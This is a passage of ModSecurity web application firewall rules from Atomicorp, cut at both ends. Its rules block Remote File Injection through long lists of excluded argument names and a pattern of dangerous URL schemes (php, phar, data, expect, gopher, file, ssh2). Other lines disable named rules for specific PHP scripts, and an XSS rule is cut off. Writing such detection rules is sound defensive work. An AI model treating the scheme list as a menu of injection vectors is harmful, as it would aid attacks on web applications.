GS:/^utm/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:/click/|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:notification_body|!ARGS:/^product_long_/|!ARGS:/^topic_content_/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:desc|!ARGS:descripcion|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/txt/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:hostname|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:newDesc|!ARGS:/return/|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:/help/|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:request_uri|!ARGS:google|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:vars[DBhostname]|!ARGS:postvars|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:replycontents|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:team[logo]|!ARGS:return|!ARGS:ureferrer|!ARGS:basehref|!ARGS:/^redirect/|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:missing_fields_redirect|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:g2_return|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:ret|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:dynafield[_SIGNATURE]|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:map_description_1|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:field5|!ARGS:p_content|!ARGS:CANCEL_RETURN|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:330162,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:fu|!ARGS:/text/|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cforms/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:theme|!ARGS:returnBond|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:media|!ARGS:parent_name|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:/blog/|!ARGS:/video/|!ARGS:/^field1/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:importremote|!ARGS:/callback/|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:akID[46][value]|!ARGS:setmedia|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:/callback/|!ARGS:subject|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:search_string|!ARGS:direct|!ARGS:yt_thumb|!ARGS:fflv|!ARGS:direct|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:user_mail_register_no_approval_required_body|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:/click/|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:notification_body|!ARGS:/^product_long_/|!ARGS:/^topic_content_/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:desc|!ARGS:descripcion|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/txt/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:hostname|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:newDesc|!ARGS:/return/|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:/help/|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:request_uri|!ARGS:google|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:vars[DBhostname]|!ARGS:postvars|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:replycontents|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:team[logo]|!ARGS:return|!ARGS:ureferrer|!ARGS:basehref|!ARGS:/^redirect/|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:missing_fields_redirect|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:g2_return|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:ret|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:dynafield[_SIGNATURE]|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:map_description_1|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:field5|!ARGS:p_content|!ARGS:CANCEL_RETURN|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:330163,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91755

SecRule REQUEST_FILENAME "/properties\.php" "phase:2,id:91756,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/db_update\.php" "phase:2,id:91757,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/prodadd\.php" "phase:2,id:91758,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/mt\.fcgi" "phase:2,id:91759,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91760,t:none,pass,nolog,skipAfter:END_RULES_91760"

SecRule ARGS|!ARGS:text|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:350474,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:text|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:350475,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS "!(^(submit\+>>|>>)$)"          "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,id:350247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',chain,logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/text/|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:fdesc|!ARGS:ldesc|!ARGS:/script/|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!A